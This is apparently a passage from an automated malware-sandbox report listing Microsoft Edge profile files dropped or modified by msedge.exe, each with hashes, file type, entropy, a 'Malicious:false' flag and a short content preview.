                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.551 1b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-08:47:12.555 1b90 Recovering log #3.2024/12/27-08:47:12.555 1b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):429
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                    MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                    SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                    SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                    SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 13, cookie 0x3, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):53248
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4137807771681827
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:Fj9P0PQkQer7773pLOgam6IUcnjl0hWP/KbtzRKToaAu:FdCe2773njl0AP/cRKcC
                                                                                                                                                                                                                                                                                    MD5:732B8CE5F371D87857C3D9E0ED0CC6CF
                                                                                                                                                                                                                                                                                    SHA1:88732244DA9F1D7B0B1C61CF5EA2E145E9A2E444
                                                                                                                                                                                                                                                                                    SHA-256:2DE16BC54D056E199FA50ADB1ED5E60AF1B825582E66342458A25C83BCDF66F1
                                                                                                                                                                                                                                                                                    SHA-512:E8666303C8764F46C5E26E3B5538DADEF0AF323F4A035D4AD5B1827083D491BEE9F8502705103A35EAE7FDD65D0F09C3C066DA30DE861957321837D046AFEE2B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238926200464801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iE+Av4Yeb8rcHEZrELFUt8dgh/+dg75LYeb8rcHEZrEZSJ:/4Yeb8nZrExg8+VtLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:CEE7AA09767163AD28E2D146210C18D7
                                                                                                                                                                                                                                                                                    SHA1:84D54F7EB74AFBD9653770193F155B74AC69A6FB
                                                                                                                                                                                                                                                                                    SHA-256:91CDCBEAB588F7DA5530C7AB0C1379F92BC7DFD3C54C91B464B1628B002A5854
                                                                                                                                                                                                                                                                                    SHA-512:C1E23919B345E85FE74B7A48AB5E409D1D965DFD8A92337CFEFB0096EC5D2E6FE114CA3ABCC55E29B229513EC78DDCBFB986D6530595D559A78F34830A26598D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.040 1a20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-08:47:16.041 1a20 Recovering log #3.2024/12/27-08:47:16.041 1a20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):408
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238926200464801
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iE+Av4Yeb8rcHEZrELFUt8dgh/+dg75LYeb8rcHEZrEZSJ:/4Yeb8nZrExg8+VtLYeb8nZrEZe
                                                                                                                                                                                                                                                                                    MD5:CEE7AA09767163AD28E2D146210C18D7
                                                                                                                                                                                                                                                                                    SHA1:84D54F7EB74AFBD9653770193F155B74AC69A6FB
                                                                                                                                                                                                                                                                                    SHA-256:91CDCBEAB588F7DA5530C7AB0C1379F92BC7DFD3C54C91B464B1628B002A5854
                                                                                                                                                                                                                                                                                    SHA-512:C1E23919B345E85FE74B7A48AB5E409D1D965DFD8A92337CFEFB0096EC5D2E6FE114CA3ABCC55E29B229513EC78DDCBFB986D6530595D559A78F34830A26598D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.040 1a20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-08:47:16.041 1a20 Recovering log #3.2024/12/27-08:47:16.041 1a20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.594264569603928
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:etZWUUlHBwl15NWw5nJVqXZTD8WpV03y1x4Cxq9Ilsw0ha75MyG:etZd5N/FqXZT3pV03Sx4Lyls5aGyG
                                                                                                                                                                                                                                                                                    MD5:532618B23AB0350C7392582CB81E0CED
                                                                                                                                                                                                                                                                                    SHA1:61CB289F4E8A9FBEA760D76AE3E006DA69AAF480
                                                                                                                                                                                                                                                                                    SHA-256:354216D4D83E6C43735424C66513E6D9213166DEC1DE377EFC44D3622E7C57CD
                                                                                                                                                                                                                                                                                    SHA-512:A2C4FE37D4BC0342DAFCD79DDA715526876D22B05355B07B82FC090C7D5E9C54D97BC2EA15D55EEFE1C94CAE28C376C2F24C99AB43D718238E2D76658C7AB04A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:....7................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":840}.!_https://ntp.msn.com..LastKnownPV..1735307249465.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735307250407.._https://ntp.msn.com..MUID!.1AA6CB7BE4CF62801FB6DE19E5AD630B.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735307249537,"schedule":[9,-1,18,16,-1,-1,-1],"scheduleFixed":[9,-1,18,16,-1,-1,-1],"simpleSchedule":[31,47,16,46,40,41,42]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735307249434.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.117441596431297
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:inyq2P923oH+Tcwt8a2jMGIFUt8dmaI1Zmw+d4YjRkwO923oH+Tcwt8a2jMmLJ:iyv4Yeb8EFUt8dmaI1/+d4YF5LYeb8bJ
                                                                                                                                                                                                                                                                                    MD5:CA36B8D64F09DEB5DB09B4756398AFAA
                                                                                                                                                                                                                                                                                    SHA1:3E4483A5E382EA6A59ECAFFB10435FAC595BECE7
                                                                                                                                                                                                                                                                                    SHA-256:BE2FE01D7B3709023B293EB7C1F3B203D016346A8417CFBD99CE739C6983BA77
                                                                                                                                                                                                                                                                                    SHA-512:C08EA581E225D3A2191B3A78F7B0C2EAFA450AB046A02D0FCCB3B35980209C03215390E9F8F1E37406DBEB61BBFEDAE1BA295367E7122C2A061BA49FB55CFDA6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.118 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.119 1070 Recovering log #3.2024/12/27-08:47:12.123 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.117441596431297
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:inyq2P923oH+Tcwt8a2jMGIFUt8dmaI1Zmw+d4YjRkwO923oH+Tcwt8a2jMmLJ:iyv4Yeb8EFUt8dmaI1/+d4YF5LYeb8bJ
                                                                                                                                                                                                                                                                                    MD5:CA36B8D64F09DEB5DB09B4756398AFAA
                                                                                                                                                                                                                                                                                    SHA1:3E4483A5E382EA6A59ECAFFB10435FAC595BECE7
                                                                                                                                                                                                                                                                                    SHA-256:BE2FE01D7B3709023B293EB7C1F3B203D016346A8417CFBD99CE739C6983BA77
                                                                                                                                                                                                                                                                                    SHA-512:C08EA581E225D3A2191B3A78F7B0C2EAFA450AB046A02D0FCCB3B35980209C03215390E9F8F1E37406DBEB61BBFEDAE1BA295367E7122C2A061BA49FB55CFDA6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.118 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-08:47:12.119 1070 Recovering log #3.2024/12/27-08:47:12.123 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\231097a9-e16f-427c-acb7-a67dc2f91d34.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\48ef9f83-ba6c-4ca4-8e5a-11512b497bdd.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\991ba866-d78c-4f57-a04d-24a3e6fab76a.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.771801683546045
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:tTvbLHSR9O5xq7LjVG6rfB8iS+Xcf0L/ZJVb:VvHyzOXqXjk6rf2+XI0LhJVb
                                                                                                                                                                                                                                                                                    MD5:D5093C13B2A67570AE390737511DD4A0
                                                                                                                                                                                                                                                                                    SHA1:4AB41FC33F733856317698D6AB5AAEE60364A7F3
                                                                                                                                                                                                                                                                                    SHA-256:60EB054D0349211A1160075E6F464B15A968CF48A82901183DC8760CFFA6339E
                                                                                                                                                                                                                                                                                    SHA-512:495008E37D39D0F69B8795ABEA0122F3CB9AF53AE27A0237D946C69ADABB60D0DF7F6BA75D787668A72CDFE742C89D85A310905BB121ABC4CDCAE8E68A33644F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2146821244220505
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTIM:eIEumQv8m1ccnvS609qRZv
                                                                                                                                                                                                                                                                                    MD5:2E438E1A076CDD8B6ACEC5EF516AB468
                                                                                                                                                                                                                                                                                    SHA1:2089FC3FE6A0B8C26778408E1BAF73296472226E
                                                                                                                                                                                                                                                                                    SHA-256:4ED9423B33CD9748B552F038CAF9AC09782339CD750D0249F8FDC78E910A0D4D
                                                                                                                                                                                                                                                                                    SHA-512:687E6E9BFDA387AB73510C2BFD2C9C968F562E488C29B1E4BD85ECF55D344CB2450D08FF0E577E69B6286E01A9E5DB0EE5EB042EEBCABB922E4B0FAC04F34D11
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF45010.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF46638.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
